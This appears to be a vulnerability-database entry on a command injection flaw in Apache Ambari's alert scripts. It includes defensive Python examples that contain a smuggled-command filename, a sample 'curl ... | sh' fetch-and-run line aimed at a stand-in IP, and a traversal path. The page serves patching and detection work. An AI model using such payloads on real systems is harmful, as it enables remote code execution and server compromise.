Cyber Resilience

CVE-2025-23196

Severity: High · Tag: RCE

Published: 21 January 2025
Modified: 09 June 2025
KEV Added: not listed (not in the CISA KEV catalog)
Patch: available (fixed in the latest Ambari releases)
CVSS v3.1 score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
EPSS score: 0.0202 (84.1st percentile)
Risk priority: 19 (weighting: 60% EPSS · 20% KEV · 20% CVSS)

Summary

CVE-2025-23196 is a high-severity Command Injection (CWE-77) vulnerability in Apache Ambari. Its CVSS base score is 8.8 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The CVE ranks in the top 15.9% of CVEs by EPSS exploit likelihood and is not currently listed in the CISA KEV catalog.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Deeper analysis

A command injection vulnerability (CWE-77, CVSS 3.1 base score 8.8) exists in the Alert Definition feature of Apache Ambari. When an alert that runs a script is defined, the script filename field is interpolated into a command string that the Ambari server executes via `sh -c`, so shell metacharacters in the filename (for example `;`, `|` or `$(...)`) are interpreted by the shell instead of being treated as part of a file name. The affected component is the alert scripting mechanism within Ambari.

An authenticated user with permission to create or edit alert definitions (PR:L in the vector) can therefore supply a crafted filename that executes arbitrary commands on the Ambari server with the privileges of the server process, potentially leading to full compromise of the host. The attack is network-reachable (AV:N) and needs no user interaction (UI:N); valid credentials are the only prerequisite.
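The two shapes described above, shown side by side as an added example. This is illustrative Python, not Ambari's own (Java) source: the `sh -c` string shape follows the advisory text, while the allowlist policy, the script directory layout and the sample attacker input are assumptions made for this example. The vulnerable function hands the user-controlled name to a shell as part of a command string; the hardened one allowlists the name (SI-10), pins it under a fixed directory and executes it as a single argv element with no shell, so the name is never parsed.

```python
"""Injectable 'sh -c' alert-script execution versus a hardened replacement.

Example code, not Ambari's source. The allowlist policy, directory layout and
attacker payload below are assumptions made for this illustration.
"""
import os
import re
import subprocess
import sys
import tempfile

# Assumed policy: a relative path of [A-Za-z0-9_.-] components, no leading '/',
# no '..' component, ending in .py or .sh. Everything else is rejected (SI-10).
SAFE_NAME = re.compile(
    r"^(?!.*(?:^|/)\.\.(?:/|$))"           # no '..' path component anywhere
    r"[A-Za-z0-9_][A-Za-z0-9_.-]*"         # first component
    r"(?:/[A-Za-z0-9_][A-Za-z0-9_.-]*)*"   # further components
    r"\.(?:py|sh)$"                        # script extension
)


def validate_script_name(name: str) -> bool:
    """True only for names that match the allowlist above."""
    return SAFE_NAME.fullmatch(name) is not None


def run_vulnerable(script_name: str, cwd: str) -> int:
    """Injectable shape: the user-supplied name becomes part of a command string
    given to 'sh -c', so ';', '|', '$(...)' and friends inside it are executed."""
    return subprocess.run(["sh", "-c", "./" + script_name], cwd=cwd).returncode


def run_hardened(script_name: str, script_dir: str) -> int:
    """Hardened shape: allowlist the name, pin it under script_dir, then run it
    with an argv list and no shell so the name is one argument, never parsed."""
    if not validate_script_name(script_name):
        raise ValueError(f"rejected alert script name: {script_name!r}")
    root = os.path.realpath(script_dir)
    full = os.path.realpath(os.path.join(root, script_name))
    if os.path.commonpath([root, full]) != root:   # also defeats symlink escapes
        raise ValueError("script resolves outside the script directory")
    cmd = [sys.executable, full] if full.endswith(".py") else ["sh", full]
    return subprocess.run(cmd).returncode


def demo() -> dict:
    """Run both shapes against the same crafted name in a scratch directory."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "harmless.sh")
        with open(script, "w") as f:
            f.write("#!/bin/sh\nexit 0\n")
        os.chmod(script, 0o755)
        payload = "harmless.sh; touch injected.marker"   # constructed attacker input
        run_vulnerable(payload, d)
        injected = os.path.exists(os.path.join(d, "injected.marker"))
        try:
            run_hardened(payload, d)
            rejected = False
        except ValueError:
            rejected = True
        return {
            "vulnerable_ran_injected_command": injected,
            "hardened_rejected_payload": rejected,
            "hardened_runs_clean_name": run_hardened("harmless.sh", d) == 0,
        }


if __name__ == "__main__":
    print(demo())
```

The allowlist alone would block this payload, but the argv-list execution is the part that removes the bug class: even a name that slipped past validation would reach the kernel as a single path argument, not as shell syntax.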

Public advisories on the Apache mailing lists and OSS-Security list confirm that the vulnerability has been addressed in the latest Ambari releases, recommending that deployments upgrade to patched versions to eliminate the command-injection vector.

EPSS remains at 0.0202 (about 2%), with no material change since disclosure; that value nonetheless places the CVE in the 84th percentile of all scored CVEs.

Vulnerability details

A code injection vulnerability exists in the Ambari Alert Definition feature, allowing authenticated users to inject and execute arbitrary shell commands. The vulnerability arises when defining alert scripts, where the script filename field is executed using `sh -c`. An attacker with authenticated access can exploit this vulnerability to inject malicious commands, leading to remote code execution on the server. The issue has been fixed in the latest versions of Ambari.

CWE(s)

CWE-77 Improper Neutralization of Special Elements used in a Command ('Command Injection')

Related Threats

MITRE ATT&CK Enterprise Techniques (AI-assigned mapping)

T1190 Exploit Public-Facing Application (Initial Access)
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.004 Command and Scripting Interpreter: Unix Shell (Execution)
Adversaries may abuse Unix shell commands and scripts for execution.
Why these techniques?

The command injection (via `sh -c` on the script filename) gives an attacker arbitrary command execution on the Ambari server application, which maps to exploitation of a public-facing application for initial access (T1190) followed by arbitrary Unix shell command execution (T1059.004).

Confidence: HIGH · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2025-23195 (same product: Apache Ambari)
CVE-2024-51941 (same product: Apache Ambari)
CVE-2026-30898 (same vendor: Apache)
CVE-2025-60021 (same vendor: Apache)
CVE-2016-15057 (same vendor: Apache)
CVE-2026-42252 (same vendor: Apache)
CVE-2026-4048 (shared CWE-77)
CVE-2026-31059 (shared CWE-77)
CVE-2026-22284 (shared CWE-77)
CVE-2024-39783 (shared CWE-77)

Affected Assets

apache / ambari: versions ≤ 2.7.9

Mitigating Controls

Mitigating Controls (NIST 800-53 r5, AI-assigned mapping)

SI-10 Information Input Validation (prevent)

Directly prevents command injection by requiring validation of untrusted inputs such as the script filename field before it reaches `sh -c`.

SI-2 Flaw Remediation (prevent)

Ensures timely patching of the specific injection flaw fixed in the latest Ambari versions.

AC-6 Least Privilege (prevent)

Limits the damage from RCE by running the Ambari server process with least privilege and restricting alert-definition access to the roles that need it.
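Patching (SI-2) closes the injection vector, but it does not tell you whether an attacker already planted a payload in a stored alert definition before the upgrade, which a responder following the T1190/T1059.004 mapping above will want to know. The following audit, added here as example code rather than an Ambari-provided tool, scans an alert-definitions listing and flags script-type sources whose path contains shell metacharacters or escapes the expected scripts directory. The JSON shape (`items[].AlertDefinition.source.type` / `.path`, as returned by `GET /api/v1/clusters/<cluster>/alert_definitions?fields=*`) and the sample records are assumptions for this example; verify the field names against your Ambari version before relying on them.

```python
"""Audit stored Ambari alert definitions for script paths that look like injected commands.

Example code, not part of Ambari. The response shape and the sample records
are constructed for this illustration (verify field names against your version).
"""
import json
import re

# Characters a shell would treat specially; none of them belongs in a script file name.
SHELL_META = re.compile(r"[;&|`$(){}<>\\\"'\s]")

# Constructed sample in the assumed shape of
# GET /api/v1/clusters/<cluster>/alert_definitions?fields=*
SAMPLE_RESPONSE = json.dumps({
    "items": [
        {"AlertDefinition": {"id": 10, "name": "namenode_ha_health", "service_name": "HDFS",
                             "source": {"type": "SCRIPT",
                                        "path": "HDFS/2.1.0.2.0/package/alerts/alert_ha_namenode_health.py"}}},
        {"AlertDefinition": {"id": 11, "name": "datanode_process", "service_name": "HDFS",
                             "source": {"type": "PORT", "uri": "{{hdfs-site/dfs.datanode.address}}"}}},
        {"AlertDefinition": {"id": 57, "name": "disk_check", "service_name": "AMBARI",
                             "source": {"type": "SCRIPT",
                                        "path": "check.sh; curl http://198.51.100.7/x | sh"}}},
        {"AlertDefinition": {"id": 58, "name": "custom", "service_name": "AMBARI",
                             "source": {"type": "SCRIPT", "path": "../../../../usr/bin/id"}}},
    ]
})


def find_suspicious_script_alerts(response_json: str) -> list:
    """Return one finding per SCRIPT-type alert whose path fails either check."""
    findings = []
    for item in json.loads(response_json).get("items", []):
        definition = item.get("AlertDefinition", {})
        source = definition.get("source") or {}
        if source.get("type") != "SCRIPT":
            continue                      # PORT, WEB, METRIC etc. carry no shell command
        path = source.get("path", "")
        reasons = []
        if SHELL_META.search(path):
            reasons.append("shell metacharacters in path")
        if path.startswith("/") or ".." in path.split("/"):
            reasons.append("path escapes the stack scripts directory")
        if reasons:
            findings.append({"id": definition.get("id"), "name": definition.get("name"),
                             "service": definition.get("service_name"),
                             "path": path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_script_alerts(SAMPLE_RESPONSE):
        print(f"alert {finding['id']} ({finding['name']}): {finding['path']!r} -> {finding['reasons']}")
```

Feed it the real listing (fetched with the Ambari admin credentials) rather than the constructed sample; any hit should be treated as an indicator of prior exploitation and the server examined for follow-on activity, not simply deleted.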
